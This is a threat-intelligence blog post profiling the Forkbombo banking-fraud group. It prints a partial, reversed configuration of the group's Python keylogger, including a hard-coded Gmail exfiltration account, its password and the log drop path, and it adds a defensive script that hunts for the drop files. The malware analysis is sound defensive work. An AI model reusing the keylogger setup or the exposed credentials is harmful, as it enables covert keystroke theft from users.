Understanding the Adversaries: The Forkbombo group.

The Forkbombo code-name for this threat actor was derived from a toolkit they used in 2016-2017 to send keylogger data out of an institution after infecting it. The receiving email address was forkbombo@gmail.com.

This is a homegrown cyber threat actor that has been active since 2015 and has grown into a large cartel made up of money launderers, hackers, coders, operators and insiders. The adversary represents a constant threat to a wide variety of institutions, mostly in the banking sector in Kenya and its neighboring countries.

This threat actor is known to specialize in Python scripts, which they use to build quick tools for the exploitation phase of an intrusion. They are also known to use open-source tools such as Empire, Metasploit, DeathStar, BloodHound, CrackMapExec, Aesshell, XmultiShell, CHAOS and Katoolin.

Their initial keylogger was written by a student who later became a bigger player in the group; he registered forkbombo@gmail.com in 2016 to receive the keylogger data, as the configuration section of the logger below shows:

# Python 2 fragment (pyHook and the email.MIME* modules are Python 2 only),
# reversed from the original Forkbombo keylogger. Only the setup and
# exfiltration configuration survives in this snapshot; the hook and mailer
# functions are not shown.
import pythoncom, pyHook, sys, logging, socket, datetime, os, win32gui, time
import smtplib
from email.MIMEMultipart import MIMEMultipart
from email.MIMEBase import MIMEBase
from email.MIMEText import MIMEText
from email import Encoders

global MAIL_SENT
MAIL_SENT = False

# Hard-coded Gmail account used as the exfiltration mailbox
gmail_user = "forkbombo@gmail.com"
gmail_pwd = "mlimani_25891011"

# Keystroke buffers (empty string literals; the extraction had collapsed
# each pair of quotes into a single curly quote)
LOG_NEWACTIVE = ''
LOG_ACTIVE = ''
LOG_TEXT = ''

now = datetime.datetime.now()
# Host identifier prepended to the captured text: "<hostname> <ip>: "
COMPUTER_NAME = socket.gethostname() + " " + socket.gethostbyname(socket.gethostname()) + ": "
LOGGED_IN = os.getenv('USERNAME')
PATH_FILE = os.getenv('UserProfile')
# Log is dropped as %UserProfile%\<username>.tar.gz (a plain text file
# despite the archive extension)
FILE_NAME = str(PATH_FILE) + "\\" + LOGGED_IN + '.tar.gz'

This email address was used in many money heists around Nairobi before the group changed to rodnetmark@gmail.com and later agentrodnet@gmail.com for further attacks. Whenever the keylogger generated data, a file with the extension .tar.gz was saved in the user's profile directory, with the username as the file name. When we responded to institutions with Forkbombo malware infestations we would find servers and workstations full of these text files carrying that extension.
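The drop location above is a cheap host-based hunt: a file named exactly after the profile directory, sitting directly at the profile root, that is text rather than a real gzip archive. The following script is an added example written for this post, not OnNet's tooling or anything recovered from the group. It assumes a profiles root such as C:\Users (or a mounted image) and builds its own constructed fixture of three profiles to run against offline; the sample keystroke text and the profile names are invented.

```python
"""Hunt for the Forkbombo keylogger drop file: %UserProfile%\\<username>.tar.gz."""
import os
import tempfile

GZIP_MAGIC = b"\x1f\x8b"  # first two bytes of any real gzip stream


def hunt_forkbombo_logs(profiles_root):
    """Return [(path, is_real_gzip)] for every <profile>/<profile>.tar.gz.

    profiles_root is e.g. C:\\Users on a live host or a mounted image
    (assumption: one directory per user profile). The logger names the drop
    after os.getenv('USERNAME') and writes it at the top of %UserProfile%,
    so only a direct child named exactly after the profile directory counts;
    archives nested deeper in the profile are ignored.
    """
    hits = []
    for profile in sorted(os.listdir(profiles_root)):
        profile_dir = os.path.join(profiles_root, profile)
        if not os.path.isdir(profile_dir):
            continue
        candidate = os.path.join(profile_dir, profile + ".tar.gz")
        if not os.path.isfile(candidate):
            continue
        with open(candidate, "rb") as fh:
            header = fh.read(2)
        # The Forkbombo drop is plain keystroke text, so a mismatch between
        # the .tar.gz name and the magic bytes is the stronger signal.
        hits.append((candidate, header == GZIP_MAGIC))
    return hits


def build_fixture():
    """Constructed test data (not real IR evidence): one infected profile,
    one clean profile, one genuine archive that matches the name pattern."""
    root = tempfile.mkdtemp(prefix="users_")
    for user in ("alice", "bob", "carol"):
        os.makedirs(os.path.join(root, user, "Documents"))
    # alice: keylogger drop, text despite the .tar.gz name
    with open(os.path.join(root, "alice", "alice.tar.gz"), "wb") as fh:
        fh.write(b"WKSTN01 10.0.0.5: [2017-03-01 09:12] notepad.exe\npassword123\n")
    # carol: a real gzip header with the same naming pattern (lower confidence)
    with open(os.path.join(root, "carol", "carol.tar.gz"), "wb") as fh:
        fh.write(GZIP_MAGIC + b"\x08\x00" + b"\x00" * 6)
    # bob: nested archive that does NOT match the drop location
    with open(os.path.join(root, "bob", "Documents", "bob.tar.gz"), "wb") as fh:
        fh.write(b"not at profile root")
    return root


if __name__ == "__main__":
    root = build_fixture()
    for path, is_gzip in hunt_forkbombo_logs(root):
        verdict = ("real gzip, review manually" if is_gzip
                   else "TEXT with .tar.gz name: likely Forkbombo log")
        print(path, "->", verdict)
```

On a live host, point hunt_forkbombo_logs at the users directory and treat a text hit as a strong indicator; the content should start with the "<hostname> <ip>: " prefix the logger builds in COMPUTER_NAME, which is a quick way to confirm the match by eye.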

A reversed keylogger snapshot of the old Forkbombo logger that sent data to a Gmail account.

In 2017, several key leaders of the Forkbombo group were arrested in a safehouse they used at Yaya Centre; the remaining hackers went to ground and split into two groups.

The OnNet team pursues them and has code-named these threat actors SilentCards and GrapZone for attribution. In 2018, GrapZone members, including money mules, regrouped and a new, bigger Forkbombo group was formed.

In the coming months, the OnNet team will share deeper CTI on these groups, including why they are currently in dispute and on opposing sides.

OnNet pays special attention to these intruders and is currently pursuing other advanced financial threats that are targeting our customers.